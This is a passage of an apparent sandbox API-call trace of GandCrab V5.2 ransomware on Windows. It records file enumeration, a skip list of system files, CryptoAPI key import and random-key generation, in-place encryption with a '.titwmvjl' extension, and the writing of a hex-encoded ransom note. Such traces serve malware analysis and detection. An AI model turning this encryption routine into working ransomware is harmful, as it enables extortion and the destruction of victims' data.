param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\d2ca4a09d2ca4deb61a.lock") returned 87 [0069.819] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\logtransport2\\logs\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2c4 [0069.820] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.820] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.820] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\") returned 63 [0069.820] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\*" [0069.820] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\*", fInfoLevelId=0x1, lpFindFileData=0x259ead4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ead4) returned 0x503338 [0069.820] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0069.820] FindNextFileW (in: hFindFile=0x503338, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0069.820] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0069.820] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0069.820] FindNextFileW (in: hFindFile=0x503338, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0069.820] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0069.820] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0069.821] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\d2ca4a09d2ca4deb61a.lock" [0069.821] lstrlenW (lpString=".titwmvjl") returned 9 [0069.821] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\d2ca4a09d2ca4deb61a.lock") returned 87 [0069.821] VirtualAlloc (lpAddress=0x0, dwSize=0xee, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.821] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 96 [0069.821] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\d2ca4a09d2ca4deb61a.lock") returned 87 [0069.821] lstrlenW (lpString=".lock") returned 5 [0069.821] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.821] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0069.821] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.821] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.821] FindNextFileW (in: hFindFile=0x503338, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0069.821] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0069.821] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0069.821] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\TITWMVJL-DECRYPT.txt" [0069.822] lstrlenW (lpString=".titwmvjl") returned 9 [0069.822] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\TITWMVJL-DECRYPT.txt") returned 83 [0069.822] VirtualAlloc (lpAddress=0x0, dwSize=0xe6, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.822] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 92 [0069.822] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\TITWMVJL-DECRYPT.txt") returned 83 [0069.822] lstrlenW (lpString=".txt") returned 4 [0069.822] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.822] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0069.822] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0069.822] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.822] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\TITWMVJL-DECRYPT.txt") returned 83 [0069.822] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\Logs\\TITWMVJL-DECRYPT.txt") returned 83 [0069.822] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0069.822] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0069.822] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0069.822] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0069.822] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0069.822] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0069.822] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0069.822] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0069.822] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.823] FindNextFileW (in: hFindFile=0x503338, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 0 [0069.823] FindClose (in: hFindFile=0x503338 | out: hFindFile=0x503338) returned 1 [0069.823] CloseHandle (hObject=0x2c4) returned 1 [0069.823] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0069.823] lstrcmpW (lpString1="LogTransport2.cfg", lpString2=".") returned 1 [0069.823] lstrcmpW (lpString1="LogTransport2.cfg", lpString2="..") returned 1 [0069.823] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpString2="LogTransport2.cfg" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\LogTransport2.cfg") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\LogTransport2.cfg" [0069.823] lstrlenW (lpString=".titwmvjl") returned 9 [0069.823] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\LogTransport2.cfg") returned 75 [0069.823] VirtualAlloc (lpAddress=0x0, dwSize=0xd6, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.824] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\LogTransport2.cfg.titwmvjl") returned 84 [0069.824] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\LogTransport2.cfg") returned 75 [0069.824] lstrlenW (lpString=".cfg") returned 4 [0069.824] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.824] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".cfg ") returned 5 [0069.824] lstrcmpiW (lpString1=".cfg", lpString2=".titwmvjl") returned -1 [0069.824] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.824] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\LogTransport2.cfg") returned 75 [0069.824] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\LogTransport2.cfg") returned 75 [0069.824] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="desktop.ini") returned 1 [0069.824] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="autorun.inf") returned 1 [0069.824] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="ntuser.dat") returned -1 [0069.824] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="iconcache.db") returned 1 [0069.824] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="bootsect.bak") returned 1 [0069.824] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="boot.ini") returned 1 [0069.824] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="ntuser.dat.log") returned -1 [0069.824] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="thumbs.db") returned -1 [0069.824] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0069.824] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0069.824] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="KRAB-DECRYPT.html") returned 1 [0069.824] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="CRAB-DECRYPT.html") returned 1 [0069.824] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="KRAB-DECRYPT.txt") returned 1 [0069.824] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="CRAB-DECRYPT.txt") returned 1 [0069.824] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="ntldr") returned -1 [0069.824] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="NTDETECT.COM") returned -1 [0069.824] lstrcmpiW (lpString1="LogTransport2.cfg", lpString2="Bootfont.bin") returned 1 [0069.824] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\LogTransport2.cfg") returned 75 [0069.824] lstrlenW (lpString=".cfg") returned 4 [0069.824] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.825] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".cfg ") returned 5 [0069.825] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.825] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.825] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\LogTransport2.cfg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\logtransport2\\logtransport2.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2c4 [0069.826] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0069.826] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.826] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4cdb38) returned 1 [0069.827] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0069.827] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0069.827] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0069.827] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259ec70 | out: pbBuffer=0x259ec70) returned 1 [0069.827] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.827] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.827] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.827] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.828] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4cdb38) returned 1 [0069.828] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2640000 [0069.828] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0069.828] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0069.828] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259ec90 | out: pbBuffer=0x259ec90) returned 1 [0069.828] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.828] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.828] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.829] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.829] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4cdb38) returned 1 [0069.829] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.829] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x503338) returned 1 [0069.830] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.830] CryptGetKeyParam (in: hKey=0x503338, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0069.830] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.830] CryptEncrypt (in: hKey=0x503338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259ec08*=0x100) returned 1 [0069.830] GetLastError () returned 0x0 [0069.830] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.830] CryptDestroyKey (hKey=0x503338) returned 1 [0069.830] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.830] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.831] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.831] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4cdb38) returned 1 [0069.832] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.832] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x503438) returned 1 [0069.832] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.833] CryptGetKeyParam (in: hKey=0x503438, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0069.833] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.833] CryptEncrypt (in: hKey=0x503438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259ec08*=0x100) returned 1 [0069.833] GetLastError () returned 0x0 [0069.833] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.833] CryptDestroyKey (hKey=0x503438) returned 1 [0069.833] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0069.833] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0069.833] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2640000 [0069.834] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2750000 [0069.834] ReadFile (in: hFile=0x2c4, lpBuffer=0x2640000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2640000*, lpNumberOfBytesRead=0x259ecb4*=0xd8, lpOverlapped=0x0) returned 1 [0069.840] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xffffff28, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.840] WriteFile (in: hFile=0x2c4, lpBuffer=0x2750000*, nNumberOfBytesToWrite=0xd8, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2750000*, lpNumberOfBytesWritten=0x259ec98*=0xd8, lpOverlapped=0x0) returned 1 [0069.853] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.853] WriteFile (in: hFile=0x2c4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259ec98*=0x21c, lpOverlapped=0x0) returned 1 [0069.854] VirtualFree (lpAddress=0x2640000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.858] VirtualFree (lpAddress=0x2750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.858] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.859] CloseHandle (hObject=0x2c4) returned 1 [0069.860] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\LogTransport2.cfg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\logtransport2\\logtransport2.cfg"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\LogTransport2.cfg.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\logtransport2\\logtransport2.cfg.titwmvjl"), dwFlags=0x1) returned 1 [0069.861] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.861] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0069.861] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0069.861] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0069.862] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\TITWMVJL-DECRYPT.txt" [0069.862] lstrlenW (lpString=".titwmvjl") returned 9 [0069.862] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\TITWMVJL-DECRYPT.txt") returned 78 [0069.862] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.862] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 87 [0069.862] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\TITWMVJL-DECRYPT.txt") returned 78 [0069.862] lstrlenW (lpString=".txt") returned 4 [0069.862] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.862] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0069.862] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0069.862] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.863] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\TITWMVJL-DECRYPT.txt") returned 78 [0069.863] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\LogTransport2\\TITWMVJL-DECRYPT.txt") returned 78 [0069.863] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0069.863] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0069.863] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0069.863] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0069.863] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0069.863] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0069.863] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0069.863] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0069.863] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.863] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0069.863] FindClose (in: hFindFile=0x5033f8 | out: hFindFile=0x5033f8) returned 1 [0069.864] CloseHandle (hObject=0x2bc) returned 1 [0069.865] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0069.865] lstrcmpW (lpString1="Sonar", lpString2=".") returned 1 [0069.865] lstrcmpW (lpString1="Sonar", lpString2="..") returned 1 [0069.865] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\", lpString2="Sonar" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar" [0069.865] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\" [0069.865] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0069.865] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.865] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0069.865] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.866] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0069.866] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.866] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0069.866] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.866] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0069.866] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.866] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.867] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\\\TITWMVJL-DECRYPT.txt") returned 71 [0069.867] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Sonar\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\sonar\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0069.868] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d